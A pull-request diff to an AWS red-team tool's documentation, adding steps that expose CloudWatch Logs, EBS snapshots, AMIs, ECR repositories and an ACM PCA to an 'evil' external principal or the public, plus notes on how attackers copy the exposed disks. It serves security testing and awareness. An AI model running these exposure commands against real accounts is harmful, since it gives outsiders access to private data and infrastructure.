Merge pull request #48 from salesforce/fix/GH-01-risk-documentation-steps-to-reproduce

Documentation: Finish risk writeups

Author: kmcquade

.gitignore

@@ -68,4 +68,5 @@ packer_cache/
 #### Repository specific
 .notes/*
 **/private.tf
-.python-version
+.python-version
+ecr-policy.json

README.md

@@ -113,7 +113,6 @@ This program makes modifications to live AWS Infrastructure, which can vary from
 
 > 🚨This will create real AWS infrastructure and will cost you money! 🚨
 
-```bash
 ```bash
 # To create the demo infrastructure
 make terraform-demo

docs/appendices/acm-pca-activation.md

@@ -0,0 +1,30 @@
+# ACM PCA Activation
+
+While the rest of the infrastructure deployed via the Terraform resources is ready to go as soon as `make terraform-demo` is finished, you will need to do some manual follow-up steps in ACM PCA for the demo to work.
+
+Follow the steps below to activate the PCA. After following these steps, you can successfully perform the Resource Exposure activities.
+
+## Create Terraform Resources
+
+* Run the Terraform code to generate the example AWS resources.
+
+```bash
+make terraform-demo
+```
+
+## Follow-up steps to activate ACM PCA
+
+
+The ACM Private Certificate Authority will have been created - but you won't be able to use it yet. Per [the Terraform docs on [aws_acmpca_certificate_authority](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/acmpca_certificate_authority), "Creating this resource will leave the certificate authority in a `PENDING_CERTIFICATE status`, which means it cannot yet issue certificates."
+
+* To solve this, navigate to the AWS Console in the selected region. Observe how the certificate authority is in the `PENDING_CERTIFICATE` status, as shown in the image below.
+
+> ![ACM PCA Pending Status](../images/acm-pca-action-required.png)
+
+* Select "Install a CA Certificate to activate your CA", as shown in the image above, marked by the **red box**.
+
+* A wizard will pop up. Use the default settings and hit **"Next"**, then **"Confirm and Install"**.
+
+* Observe that your root CA certificate was installed successfully, and that the STATUS of the CA is ACTIVE and able to issue private certificates.
+
+.. and now you are ready to pwn that root certificate with this tool 😈

docs/appendices/terraform-demo-infrastructure.md

@@ -0,0 +1,38 @@
+# Terraform Demo Infrastructure
+
+This program makes modifications to live AWS Infrastructure, which can vary from account to account. We have bootstrapped some of this for you.
+
+> 🚨This will create real AWS infrastructure and will cost you money! 🚨
+
+> _Note: It is not exposed to rogue IAM users or to the internet at first. That will only happen after you run the exposure commands._
+
+## Prerequisites
+
+* Valid credentials to an AWS account
+* AWS CLI should be set up locally
+* Terraform should be installed
+
+
+### Installing Terraform
+
+* Install `tfenv` (Terraform version manager) via Homebrew, and install Terraform 0.12.28
+
+```bash
+brew install tfenv
+tfenv install 0.12.28
+tfenv use 0.12.28
+```
+
+### Build the demo infrastructure
+
+* Run the Terraform code to generate the example AWS resources.
+
+```bash
+make terraform-demo
+```
+
+* Don't forget to clean up after.
+
+```bash
+make terraform-destroy
+```

docs/risks/acm-pca.md

@@ -2,31 +2,7 @@
 
 ## Steps to Reproduce
 
-First, set up the demo resources. Then you can follow the exposure steps.
-
-### Setting up the demo resources
-
-* Run the Terraform code to generate the example AWS resources.
-
-```bash
-make terraform-demo
-```
-
-The ACM Private Certificate Authority will have been created - but you won't be able to use it yet. Per [the Terraform docs on [aws_acmpca_certificate_authority](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/acmpca_certificate_authority), "Creating this resource will leave the certificate authority in a `PENDING_CERTIFICATE status`, which means it cannot yet issue certificates."
-
-* To solve this, navigate to the AWS Console in the selected region. Observe how the certificate authority is in the `PENDING_CERTIFICATE` status, as shown in the image below.
-
-> ![ACM PCA Pending Status](../images/acm-pca-action-required.png)
-
-* Select "Install a CA Certificate to activate your CA", as shown in the image above, marked by the **red box**.
-
-* A wizard will pop up. Use the default settings and hit **"Next"**, then **"Confirm and Install"**.
-
-* Observe that your root CA certificate was installed successfully, and that the STATUS of the CA is ACTIVE and able to issue private certificates.
-
-.. and now you are ready to pwn that root certificate with this tool 😈
-
-### Exposure Steps
+* ‼️ If you are using the Terraform demo infrastructure, you must take some follow-up steps after provisioning the resources in order to be able to expose the demo resource. This is due to how ACM PCA works. For instructions, see the [Appendix on ACM PCA Activation](../appendices/acm-pca-activation.md)
 
 * To expose the resource using `endgame`, run the following from the victim account:
 
@@ -48,7 +24,7 @@ export CERTIFICATE_ARN = arn:aws:acm-pca:$AWS_REGION:$VICTIM_ACCOUNT_ID:certific
 aws acm-pca list-permissions --certificate-authority-arn $CERTIFICATE_ARN
 ```
 
-* Observe that the contents of the exposed resource Policy match the example shown below.
+* Observe that the contents of the overly permissive resource-based policy match the example shown below.
 
 ## Example
 

docs/risks/cloudwatch-logs.md

@@ -4,10 +4,42 @@ CloudWatch Resource Policies allow other AWS services or IAM Principals to put l
 
 ## Steps to Reproduce
 
+* To expose the resource using `endgame`, run the following from the victim account:
+
+```bash
+export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
+
+endgame expose --service cloudwatch --name test-resource-exposure
+```
+
+* To view the contents of the exposed resource policy, run the following:
+
+```bash
+aws logs describe-resource-policies
+```
+
+* Observe that the contents of the exposed resource policy match the example shown below.
+
 ## Example
 
+```json
+{
+    "resourcePolicies": [
+        {
+            "policyName": "test-resource-exposure",
+            "policyDocument": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":[\"logs:PutLogEventsBatch\",\"logs:PutLogEvents\",\"logs:CreateLogStream\"],\"Resource\":\"arn:aws:logs:*\"}]}",
+            "lastUpdatedTime": 1613244111319
+        }
+    ]
+}
+```
+
 ## Exploitation
 
+```
+TODO
+```
+
 ## Remediation
 
 > ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
@@ -25,4 +57,5 @@ Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaini
 
 * [CloudWatch Logs Resource Policies](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/iam-access-control-overview-cwl.html)
 * [API Documentation: PutResourcePolicy](https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutResourcePolicy.html)
-* [aws logs put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/put-resource-policy.html)
+* [aws logs put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/put-resource-policy.html)
+* [aws logs describe-resource-policy](https://docs.aws.amazon.com/cli/latest/reference/logs/describe-resource-policies.html)

docs/risks/ebs.md

@@ -2,10 +2,61 @@
 
 ## Steps to Reproduce
 
+* To expose the resource using `endgame`, run the following from the victim account:
+
+```bash
+export EVIL_PRINCIPAL=*
+export SNAPSHOT_ID=snap-1234567890abcdef0
+
+endgame expose --service ebs --name $SNAPSHOT_ID
+```
+
+* To expose the resource using the AWS CLI, run the following from the victim account:
+
+```bash
+export SNAPSHOT_ID=snap-1234567890abcdef0
+
+aws ec2 modify-snapshot-attribute \
+    --snapshot-id $SNAPSHOT_ID \
+    --attribute createVolumePermission \
+    --operation-type add \
+    --group-names all
+```
+
+* To verify that the snapshot has been shared with the public, run the following from the victim account:
+
+```bash
+export SNAPSHOT_ID=snap-1234567890abcdef0
+
+aws ec2 describe-snapshot-attribute \
+    --snapshot-id $SNAPSHOT_ID \
+    --attribute createVolumePermission
+```
+
+* Observe that the contents match the example shown below.
+
 ## Example
 
+The response of `aws ec2 describe-snapshot-attribute` will match the below, indicating that the EBS snapshot is public.
+
+```json
+{
+    "SnapshotId": "snap-066877671789bd71b",
+    "CreateVolumePermissions": [
+        {
+            "Group": "all"
+        }
+    ]
+}
+```
+
 ## Exploitation
 
+After an EBS Snapshot is made public, an attacker can then:
+* [copy the public snapshot](https://docs.aws.amazon.com/cli/latest/reference/ec2/copy-snapshot.html) to their own account
+* Use the snapshot to create an EBS volume
+* Attach the EBS volume to their own EC2 instance and browse the contents of the disk, potentially revealing sensitive or otherwise non-public information.
+
 ## Remediation
 
 > ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
@@ -23,3 +74,4 @@ Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaini
 
 * [Sharing an Unencrypted Snapshot using the Console](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html#share-unencrypted-snapshot)
 * [Share a snapshot using the command line](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html)
+* [aws ec2 copy-snapshot](https://docs.aws.amazon.com/cli/latest/reference/ec2/copy-snapshot.html)

docs/risks/ec2-amis.md

@@ -2,10 +2,54 @@
 
 ## Steps to Reproduce
 
+* To expose the resource using `endgame`, run the following from the victim account:
+
+```bash
+export EVIL_PRINCIPAL=*
+export IMAGE_ID=ami-5731123e
+
+endgame expose --service ebs --name $SNAPSHOT_ID
+```
+
+* To expose the resource using AWS CLI, run the following from the victim account:
+
+```bash
+aws ec2 modify-image-attribute \
+    --image-id ami-5731123e \
+    --launch-permission "Add=[{Group=all}]"
+```
+
+* To validate that the resource has been shared publicly, run the following:
+
+```bash
+aws ec2 describe-image-attribute \
+    --image-id ami-5731123e \ 
+    --attribute launchPermission
+```
+
+* Observe that the contents of the exposed AMI match the example shown below.
+
 ## Example
 
+The output of `aws ec2 describe-image-attribute` reveals that the AMI is public if the value of "Group" under "LaunchPermissions" is equal to "all"
+
+```
+{
+    "LaunchPermissions": [
+        {
+            "Group": "all"
+        }
+    ],
+    "ImageId": "ami-5731123e",
+}
+```
+
 ## Exploitation
 
+After an EC2 AMI is made public, an attacker can then:
+* [Copy the AMI](https://docs.aws.amazon.com/cli/latest/reference/ec2/copy-image.html) into their own account
+* Launch an EC2 instance using that AMI and browse the contents of the disk, potentially revealing sensitive or otherwise non-public information.
+
 ## Remediation
 
 > ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
@@ -21,4 +65,5 @@ Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaini
 
 ## References
 
-- [aws ec2 modify-image-attribute](https://docs.aws.amazon.com/cli/latest/reference/ec2/modify-image-attribute.html)
+- [aws ec2 modify-image-attribute](https://docs.aws.amazon.com/cli/latest/reference/ec2/modify-image-attribute.html)
+- [aws ec2 describe-image-attribute](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-image-attribute.html)

docs/risks/ecr.md

@@ -2,10 +2,68 @@
 
 ## Steps to Reproduce
 
+* To expose the resource using `endgame`, run the following from the victim account:
+
+```bash
+export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
+
+expose --service ecr --name test-resource-exposure
+```
+
+* Alternatively, to expose the resource using the AWS CLI:
+
+Create a file named `ecr-policy.json` with the following contents:
+
+```json
+{
+    "Version" : "2008-10-17",
+    "Statement" : [
+        {
+            "Sid" : "allow public pull",
+            "Effect" : "Allow",
+            "Principal" : "*",
+            "Action" : [
+                "ecr:*"
+            ]
+        }
+    ]
+}
+```
+
+Then run the following from the victim account:
+
+```bash
+aws ecr set-repository-policy --repository-name test-resource-exposure --policy-text file://ecr-policy.json
+```
+
+* To view the contents of the exposed resource policy, run the following:
+
+```bash
+aws ecr get-repository-policy \
+    --repository-name test-resource-exposure
+```
+
+* Observe that the contents match the example shown below.
+
+
 ## Example
 
+The policy shown below shows a policy that grants access to Principal `*`. If the output contains `*` in Principal, that means the ECR repository is public. If the Principal contains just an account ID, that means it is shared with another account.
+
+```json
+{
+    "registryId": "111122223333",
+    "repositoryName": "test-resource-exposure",
+    "policyText": "{\n  \"Version\" : \"2008-10-17\",\n  \"Statement\" : [ {\n    \"Sid\" : \"allow public pull\",\n    \"Effect\" : \"Allow\",\n    \"Principal\" : \"*\",\n    \"Action\" : \"ecr:*\"\n  } ]\n}"
+}
+```
+
 ## Exploitation
 
+```
+TODO
+```
+
 ## Remediation
 
 > ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊